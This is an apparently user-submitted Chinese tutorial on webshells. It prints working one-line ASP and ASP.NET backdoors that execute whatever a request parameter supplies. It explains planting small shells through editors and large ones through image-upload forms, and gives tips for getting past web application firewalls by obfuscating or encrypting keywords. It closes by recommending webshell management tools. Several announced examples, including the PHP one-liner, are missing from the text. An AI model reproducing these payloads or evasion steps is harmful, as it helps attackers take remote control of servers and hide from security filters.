一 ：定义

木马实际上就是一个包含了执行请求并返回结果的文件，木马通常来说分为大马和小马，这是针对文件的大小来进行区分的。

小马通常是通过在线文本编辑器上传的，可以将小马的代码插入上传的代码中，然后通过小马上传大马。

如果有上传图片或者文件的接口，一般直接上传大马

二：最简单的木马

ASP一句话木马

<%eval request("cknife")%>

ASP.NET一句话木马

<%@Page Language="Jscript"%><%eval(Request.Item["cknife"],"unsafe");%> 

PHP一句话木马

三：小马变形

 WAF不光对输入的参数进行检查，对上传的数据和文件也会进行检查

WAF查杀木马一般都是以关键词为线索，也就是说避开一般的关键词就可以了。

采用替换关键词的部分字符、加密关键词、采用多个无用的函数构建关键词

原始一句话木马

替换关键词的部分字符串

 这样还不够安全，通过PHP在线加密网加密后就很安全了

http://www.phpjm.net/encode.html

加密效果

 四：大马

大马的功能有很多，可以查看服务器的详细信息，可以上传下载文件，可以执行系统命令，可以直接使用

一般通过上传图片的接口进行上传

五：木马连接工具

小马如果不借助工具去使用，就会显得太复杂了，推荐C刀 蚁剑，跨平台

在连接木马时，会使用一个随机的端口

更多webshell管理工具点击这里

本文来自互联网用户投稿，文章观点仅代表作者本人，不代表本站立场，不承担相关法律责任。如若转载，请注明出处。 如若内容造成侵权/违法违规/事实不符，请点击【内容举报】进行投诉反馈！